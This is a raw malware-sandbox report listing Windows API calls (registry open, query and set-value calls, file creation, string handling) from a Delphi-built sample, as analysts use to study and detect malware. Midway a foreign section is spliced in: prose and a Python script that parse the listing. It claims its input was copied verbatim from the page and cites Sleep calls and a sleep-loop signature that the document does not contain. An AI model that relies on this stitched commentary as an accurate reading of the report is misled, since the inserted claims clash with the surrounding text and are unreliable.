                                                                                                    • Opcode ID: 25653522eac89486967f0396ffd81156270adfff78a33eb3207f8559d2e795ea
                                                                                                    • Instruction ID: 210b8a98c92cc6c6dd877ced6ee0dd2ad7699c55e9f22dfc8dc813c4667524cb
                                                                                                    • Opcode Fuzzy Hash: 25653522eac89486967f0396ffd81156270adfff78a33eb3207f8559d2e795ea
                                                                                                    • Instruction Fuzzy Hash: E00169766202856FCB10FBACDCC0E9B77BDEB59341F258218B964DB2C5DA7199C087A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D038C
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D03F7
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 032D045C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 9a2c1d94019d02742e49da400e7bdb3467dddb118a1cf7b1459d1007e0cd3e13
                                                                                                    • Instruction ID: 58c7bf2aeb0b45ffa9107a1c769b47defed26bc689488dc485ec68c02f19e90b
                                                                                                    • Opcode Fuzzy Hash: 9a2c1d94019d02742e49da400e7bdb3467dddb118a1cf7b1459d1007e0cd3e13
                                                                                                    • Instruction Fuzzy Hash: B441B038A20308BFDB11EBA4C981FDEB7F9EF44344F148069E854A7662C7B49F859740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032C9CFC
                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032C9D2A
                                                                                                      • Part of subcall function 032B8CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,032C5B68,032C9D6A,00000000,032C9DE8,?,?,032C5B68), ref: 032B8D2E
                                                                                                      • Part of subcall function 032B8F1C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,032C5B68,032C9D85,00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032B8F3B
                                                                                                    • GetLastError.KERNEL32(00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032C9D8F
                                                                                                      • Part of subcall function 032BB878: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,032BD5E5,00000000,032BD63F), ref: 032BB897
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 503785936-0
                                                                                                    • Opcode ID: a5ba04a63b56f6527a2775bc69fca4f295824bedbb012ea17d9ab160e3d61dc6
                                                                                                    • Instruction ID: 9aa324c69c928bde30d562e2593eb24a45b9d68b00adce39066ada96bead7814
                                                                                                    • Opcode Fuzzy Hash: a5ba04a63b56f6527a2775bc69fca4f295824bedbb012ea17d9ab160e3d61dc6
                                                                                                    • Instruction Fuzzy Hash: BD318478A207499FDB00FFA5C880BDEB7F5AF09740F508169E504BB381D7B55984CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
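The Sleep, RegOpenKeyExA and CreateFileA entries above are raw argument dumps in the report's `API.MODULE(arg,...), ref: ADDR` form. The Python below is an added editorial example, not code from the Joe Sandbox report or from the sample: it parses lines in that form (including the indented "Part of subcall function" variant), decodes the registry access masks (0x20019 is KEY_READ), the CreateFile access mask and creation disposition to their documented Win32 names, and flags a function whose Sleep calls pair Sleep(0) with a short Sleep as a wait-and-retry loop of the kind behind the "May sleep (evasive loops)" signature. The sample input is constructed from the lines on this page; the group labels, the argument positions and the 100 ms loop threshold are this example's own assumptions.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Constructed input: API lines copied verbatim from the function listing on this
# page, grouped under a label chosen here (the first ref address in each group).
SAMPLE_LISTING: Dict[str, List[str]] = {
    "032B186C": [
        "Sleep.KERNEL32(00000000,?,032B205D), ref: 032B186C",
        "Sleep.KERNEL32(0000000A,00000000,?,032B205D), ref: 032B1882",
    ],
    "032D038C": [
        "RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D038C",
        "RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D03F7",
        "RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 032D045C",
    ],
    "032C9CFC": [
        "CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,032C9DE8,?,?,032C5B68,00000001), ref: 032C9CFC",
        "  • Part of subcall function 032B8CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,032C5B68,032C9D6A,00000000,032C9DE8,?,?,032C5B68), ref: 032B8D2E",
    ],
}

# One report line: optional "Part of subcall function X:" prefix, then
# API.MODULE(arg,arg,...), ref: ADDR. "?" marks an argument the sandbox could not resolve.
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented Win32 constants.
REG_ACCESS = {0x20000: "READ_CONTROL", 0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE",
              0x4: "KEY_CREATE_SUB_KEY", 0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY",
              0x20: "KEY_CREATE_LINK", 0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}
KEY_READ = 0x20019  # READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
FILE_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
POLL_SLEEP_MAX_MS = 100  # assumption: a Sleep this short beside Sleep(0) is a polling loop


class ApiCall(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: int
    subcall: Optional[str]


class Finding(NamedTuple):
    func: str
    kind: str
    detail: str


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.search(line)
    if not m:
        return None
    return ApiCall(m["api"], m["mod"], [a.strip() for a in m["args"].split(",")],
                   int(m["ref"], 16), m["sub"])


def arg_int(call: ApiCall, index: int) -> Optional[int]:
    """Argument `index` as an int, or None when it is missing or unresolved ('?')."""
    if index >= len(call.args) or call.args[index] == "?":
        return None
    return int(call.args[index], 16)


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Split a bitmask into the names from `table`; leftover bits are kept as hex."""
    names, remaining = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if remaining & bit == bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append(f"0x{remaining:X}")
    return names


def analyze(listing: Dict[str, List[str]]) -> List[Finding]:
    findings: List[Finding] = []
    for func, lines in listing.items():
        calls = [c for c in map(parse_line, lines) if c is not None]
        # Sleep(0) only yields the time slice; a short Sleep next to it is a wait-and-retry loop.
        sleeps = [arg_int(c, 0) for c in calls if c.api == "Sleep" and c.subcall is None]
        if 0 in sleeps and any(v is not None and 0 < v <= POLL_SLEEP_MAX_MS for v in sleeps):
            findings.append(Finding(func, "sleep_poll_loop", f"Sleep ms: {sleeps}"))
        for c in calls:
            prefix = f"subcall {c.subcall}: " if c.subcall else ""
            if c.api.startswith("RegOpenKeyEx"):  # samDesired is argument 3
                acc = arg_int(c, 3)
                if acc is not None:
                    name = "KEY_READ" if acc == KEY_READ else "|".join(decode_flags(acc, REG_ACCESS))
                    findings.append(Finding(func, "reg_open", prefix + name))
            elif c.api.startswith("CreateFile"):  # dwDesiredAccess is 1, dwCreationDisposition is 4
                acc, disp = arg_int(c, 1), arg_int(c, 4)
                access = "?" if acc is None else ("|".join(decode_flags(acc, FILE_ACCESS)) or "0")
                findings.append(Finding(func, "create_file",
                                        f"{prefix}access={access} disposition={CREATE_DISPOSITION.get(disp, disp)}"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LISTING):
        print(f"{f.func} {f.kind}: {f.detail}")
```

Run against the constructed listing, the script reports the Sleep(0)/Sleep(10) pair in the function at 032B186C as a polling loop, shows the three RegOpenKeyExA calls progressively dropping rights from KEY_READ to KEY_QUERY_VALUE (a retry-with-less-access pattern), and reads the outer CreateFileA as GENERIC_READ|GENERIC_WRITE with CREATE_ALWAYS, i.e. a file being created or overwritten rather than merely read.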

                                                                                                    APIs
                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,03424BB0), ref: 0330C894
                                                                                                    • RegSetValueExA.ADVAPI32(00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0330C8FF), ref: 0330C8CC
                                                                                                    • RegCloseKey.ADVAPI32(00000884,00000884,00000000,00000000,00000001,00000000,0000001C,00000000,0330C8FF), ref: 0330C8D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 779948276-0
                                                                                                    • Opcode ID: 7cc262b330ad7784a812d87603e05bc9a749505bc193c2fb73195cdbcac080ea
                                                                                                    • Instruction ID: f1a17031aff7bd88e9f328a9cdd9dac1ac10fd78604ed477fd5055c15da43677
                                                                                                    • Opcode Fuzzy Hash: 7cc262b330ad7784a812d87603e05bc9a749505bc193c2fb73195cdbcac080ea
                                                                                                    • Instruction Fuzzy Hash: EA111275610308AFDB10FBA6DDD1A9D7BFCEB04740F504061F904EF352D7709A818A54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: b28c646f82ce2cd252d90ea0baface2e61be537eb1fdf2171e89f56c4c3785db
                                                                                                    • Instruction ID: 20ec674f9ad1c45274e0d5cd7f1a3e2518cd91444840188a60dc0c1ca64c90d6
                                                                                                    • Opcode Fuzzy Hash: b28c646f82ce2cd252d90ea0baface2e61be537eb1fdf2171e89f56c4c3785db
                                                                                                    • Instruction Fuzzy Hash: 68F08C69A3420067DA11FB289E845EA63BC9F017C0F6844E5E4469B216CBB48CCAA322
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(0330C964), ref: 032B4F76
                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 032B5063
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 032B5075
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 986138563-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 032CF5A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID: H
                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,032D053C), ref: 032D050A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: MS Shell Dlg 2
                                                                                                    • API String ID: 3660427363-3198668166
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,032D053C), ref: 032D050A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: MS Shell Dlg 2
                                                                                                    • API String ID: 3660427363-3198668166
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 032BFAED
                                                                                                      • Part of subcall function 032BF6D0: VariantClear.OLEAUT32(?), ref: 032BF6DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy
                                                                                                    • String ID:
                                                                                                    • API String ID: 274517740-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegFlushKey.ADVAPI32(00000000,?,032D02F8,?,?,00000000,032D04A4,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 032D029D
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,032D02F8,?,?,00000000,032D04A4,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 032D02A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFlush
                                                                                                    • String ID:
                                                                                                    • API String ID: 320916635-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1927566239-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,032D04BA), ref: 032D038C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 032D05F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 032D05F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• CompareStringA.KERNEL32(00000800,00000001,00000000,00000000,00000000,00000000,00000000,032B384B), ref: 032B382A
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CompareString
• String ID:
• API String ID: 1825529933-0
• Opcode ID: bf0c3e41c8258e1040ecb6f4588be7dff2aa38a5aa895a3fad192489fd0d13ab
• Instruction ID: b385912d999c5f625c219f9f45cc87425d2448a1e7b8743e5b95bc86130b7b82
• Opcode Fuzzy Hash: bf0c3e41c8258e1040ecb6f4588be7dff2aa38a5aa895a3fad192489fd0d13ab
• Instruction Fuzzy Hash: C001F278624308AFCB00FA699D929DEB6BCDB08740F5204B4B404E7652DBB05F808654
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 032B73CB
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
• Instruction ID: 38d29cf9e6146eed75b88516e3a46a6d5ba53f5d43abe03f604237a1b77223a2
• Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
• Instruction Fuzzy Hash: 81F07AB6700218BF9B80DE9DDC80EEB77ECEB8C2A4B054165BA0CD7200D670ED508BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 032B73CB
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
• Instruction ID: 3c8f5c06fcfe07936af61cb21250ba916c6302b9643dfbfc1f8725505eaf2a4c
• Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
• Instruction Fuzzy Hash: ACF09DB6600218BF8B80DE9DDC80EDB77ECEB8C2A4B054165FA0CD7200D670ED508BB4
Uniqueness

Uniqueness Score: -1.00%

APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,032CEF85,?,?,?,00000000), ref: 032CEF65
  • Part of subcall function 032B4F68: SysFreeString.OLEAUT32(0330C964), ref: 032B4F76
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
• Opcode ID: a3310e8892e7b42386c3ae6f0fab848dffacee4ddbeac79324908176d918edb4
• Instruction ID: 2de52f034a35863c78b5df1adfde5af906a9b08782a00ef2abaf94f11da891cb
• Opcode Fuzzy Hash: a3310e8892e7b42386c3ae6f0fab848dffacee4ddbeac79324908176d918edb4
• Instruction Fuzzy Hash: 7CE0E5346343487FD711EA61DC5199DB6ACDF8A780BB248B5E40097500DAB45E4080A0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(032B0000,?,00000105), ref: 032B5B96
  • Part of subcall function 032B5DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,032B0000,0331A794), ref: 032B5DF8
  • Part of subcall function 032B5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032B0000,0331A794), ref: 032B5E16
  • Part of subcall function 032B5DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032B0000,0331A794), ref: 032B5E34
  • Part of subcall function 032B5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 032B5E52
